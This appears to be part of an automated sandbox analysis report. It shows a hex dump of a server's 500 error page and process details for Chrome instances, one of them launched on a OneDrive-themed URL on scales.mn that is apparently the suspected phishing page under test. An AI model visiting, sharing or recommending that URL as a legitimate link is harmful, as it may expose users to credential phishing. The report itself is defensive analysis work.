2025-01-06 18:23:11 UTC	663	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 2332, Parent PID: 3156

General

Target ID:	0
Start time:	13:22:55
Start date:	06/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 3484, Parent PID: 2332

General

Target ID:	1
Start time:	13:22:59
Start date:	06/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2356,i,4760404988359330048,10640296154524373879,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6492, Parent PID: 3156

General

Target ID:	3
Start time:	13:23:05
Start date:	06/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://scales.mn/file/one-drv11.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly